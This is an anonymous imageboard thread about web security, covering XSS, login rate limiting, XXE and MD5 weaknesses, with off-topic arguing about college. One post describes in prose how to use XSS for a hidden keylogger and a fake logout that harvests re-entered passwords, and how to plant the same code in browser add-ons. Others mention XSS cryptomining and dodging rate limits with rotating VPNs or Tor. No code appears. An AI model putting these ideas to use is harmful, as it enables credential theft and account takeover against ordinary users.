Web Security Thread

ITT we discuss web security.

I wonder how many web security nerds even know how to do anything with XSS vulns aside from useless shit like alert boxes lol

``it's a proof of concept, use your imagination to figure out the possibilities for post-exploitation''

translation: how do i sploit xss? i dunno lol

You should only use cgis written in C.

>>3
Why would you mention C in a thread about security?
U MENA RUST?
muh memory safety

That being said, C and cgi are ancient as fuck. It's all about Node now, gramps.

I don't even know what security issues cgi/C stuff has, but it's so old that it's no longer relevant. Regardless of what you think about the current state of modern web development, the fact of the matter is that people are using shit like MEAN, so you need to keep up with current tech trends, even if you insist that older shit is better.

But then again, you were probably just joking and I'm probably just autistic, right?

>>2
Say you have a xss. The "best" you can do I think is silently insert a script to keylog an user's input. This is better than stealing cookies, because their logins might be cross-tested on different sites and applications and pass, meaning you can get logins to many different things like social media and even bank accounts, if you get an email and password that they use for everything. (A "master key".)

You can even force them out of the website (they'll think it's a bug) so they have to login again. You log them off without changing the page, just by manipulating html elements, then insert an event listener on the input elements you've created or exposed, in such a way that they think the webpage is behaving normally and some sort of regular fault got them off of the service.

Another alternative to xss is inserting these things in "popular addons" in Firefox Stores and such. These take time to verify, and you always catch something (I assume) before it is completely exposed, more so if your addon does in fact solve a problem or is functional. Just make sure to do the basics of protecting your identity and you can keep trying these and redoing them for literally forever (for some understood definition of literally and forever).

>>6
Most normies either use Chrome (desktop and mobile) or Safari (on iOS) though. Firefox is dying slowly but surely.

>>7
I think chrome desktop supports addons/extensions, so it's basically the same thing. Unless they sandbox it efficiently, or implement it differently.

>>2
I don't do security on web (I'm more of a low-level buffer overflowing kinda guy) but if I had an XSS vuln I'd just use it to mine cryptocurrencies, that has the best effort-to-profit ratio

>>5
what if instead you show an alert popup that says ''haxx0red!!'

what if it showed you an alert which checked your're are dubs?

If a site has rate-limiting for login attempts, you can just rotate VPNs or Tor exit nodes to get more attempts. So how would a web developer make their site safe from these kinds of attacks? Getting around rate limiting, that is.

Is security impossible?

>>12
rate limit based on username

>>14
But then you can just lock people out of their accounts by making a bunch of incorrect login attempts. Or is that more desirable than the alternatives?

my girlfrend make out
my phone rigns
I anser it yet dad is ded
but who was phone?

Anybody here know anything about XML External Entity Processing (XXE)?

I learned JSON instead of XML in uni because XML is older/outdated, but it seems interesting from a security standpoint.

>>12
Profiling, treating login attempts like spam. It's what google does with their search requests, no bots pass, and sometimes it catches people too.

Alternatively, captchas for each login attempt.

>>18

and sometimes it catches people too.

I have to fill out extra captchas all the time because I use a VPN
no VPN = no more extra captchas

>>17

I learned JSON instead of XML in uni

Neither JSON nor XML is something that you need to go to uni to learn. You can understand both of them in just 5 minutes.

>>20

t. no-degree brainlet

protip: college isn't just about learning programming, it's also about meeting people to work on projects with and network with and all that good stuff

can't do that using www.gaymediocrefreecodeschool.cum

>>21

t. no-degree brainlet

*PhD brainlet

it's also about meeting people to work on projects with and network

No, it isn't.

>>21
data formats aren't programming, dolt

>>22

PhD

Good for you. Still doesn't invalidate what I said.

No, it isn't.

You're completely wrong on that.

College is useful for meeting people, is it not? To say that you can learn computer science outside of college doesn't mean college isn't worth it. Maybe you're jaded since you're probably drowning in debt from undergrad and a master's and a PhD, but so far my undergrad experience has been great. I've studied abroad and met tons of people and worked on websites and apps with cool people I never would have met otherwise. Can't do that with man pages or Youtube tutorials. Sure, there's Meetup or Craiglist, but they kind of suck by comparison.

>>23
How are data formats not related to programming? Ever made a Node backend? Express and Mongoose and JSON schema and all that. That actually is programming. The way you structure your data affects how you program shit.

Programming is more than just opening an IDE and writing some gay Lisp code. Programming is changing, gramps.

>>24

Good for you. Still doesn't invalidate what I said.

It does actually. You claimed that I have no degree.

College is useful for meeting people, is it not?

Yes, meeting professors if you want to go to academia afterwards.

and worked on websites and apps with cool people I never would have met otherwise

IRC, FOSS communities, etc..

Welp. Mr PhD over here has a PhD, therefore you can't meet people in college. And meeting people in college isn't important. QED. I've been owned by that flawless logic. Clearly only a highly intelligent person with a PhD could construct an amazing argument like that.

>>26
And don't you forget it either!

Can I still use md5?

>>28
depends
it's fast but insecure
still useful in places where bcrypt or whatever is too computationally intensive

>>28

A 2013 attack by Xie Tao, Fanbao Liu, and Dengguo Feng breaks MD5 collision resistance in 2^18 time. This attack runs in less than a second on a regular computer.[2]
MD5 is prone to length extension attacks.
It can still be used as a checksum to verify data integrity, but only against unintentional corruption.

>>30
so basically, the good thing about md5 is that it's a quick checksum algorithm -- making sure file transfers didn't fuck up, or things like that -- areas in trust zones where you're not concerned about security because something else handled security beforehand

the bad thing is that it's too quick for security

the large checksum collider

I'm assuming "length extension attacks" means padding a file to get one checksum to be identical to another, due to the pigeonhole principle

An NVIDIA GeForce 8800 Ultra can calculate more than 200 million hashes per second.[19]

MD5 uses the Merkle–Damgård construction, so if two prefixes with the same hash can be constructed, a common suffix can be added to both to make the collision more likely to be accepted as valid data by the application using it. Furthermore, current collision-finding techniques allow to specify an arbitrary prefix: an attacker can create two colliding files that both begin with the same content.

The non-linear function has only a 32-bit output, so it's more like four 32 bit hashes chained together

>>32
Remember when the Q6600 and 8800GT were /g/'s official hardware recommendations?

I never had an 8800 Ultra, but I did have an 8800GTX.

Damn, I'm getting old. Where did the time go?

lol
Aand, the non-linear function is compressing at 4:1 (5:1 counting the input), so there will be 2^96 colliding input states for a given 32 bit output

you could probably just drop a block of input and it would be secure enough, given it isn't used for anything too sensitive or valuable

Wait, no, it's already 3:1, and 2^64.. And only using a weak non-linear function(s)

MAKE MY NON-LINEAR FUNCTION WEAK, DADDY

>>31

I'm assuming "length extension attacks" means padding a file to get one checksum to be identical to another, due to the pigeonhole principle

no, that would be 'collision'. length extension is for situations in which someone makes a pseudo-HMAC by concatenating a message with a secret key and hashing that. in theory, you shouldn't be able to modify the message because you wouldn't be able to recalculate hash, but you actually can find hash of secret key + message + your message in some specific hashing functions (mostly the ones based on Merkle-Damgard)

here's an explanation: https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks

H(b, c, d) = b xor c xor d
I'm pretty sure that's not even nonlinear, and the others are all similarly bit-aligned
And then it does three consecutive additions mod 2^32, which should cancel to one addition?
Finally, a rotation and another addition

Not sure if replacing the block C input with a constant will actually help all that much, but maybe a little

Uhhh... can't you just create collisions directly through the mod 2^32 input addition though..?

1 chosen variant round + 3 dummy rounds + 4x 32bit addition attack rounds

There's a slight obfuscation in the first attack round, where it adds in the unique B state after a rotation, but the collision gets stored in state B

Then it's just a subtraction for three rounds..?
I don't think that rote plus addition is going to add too much difficulty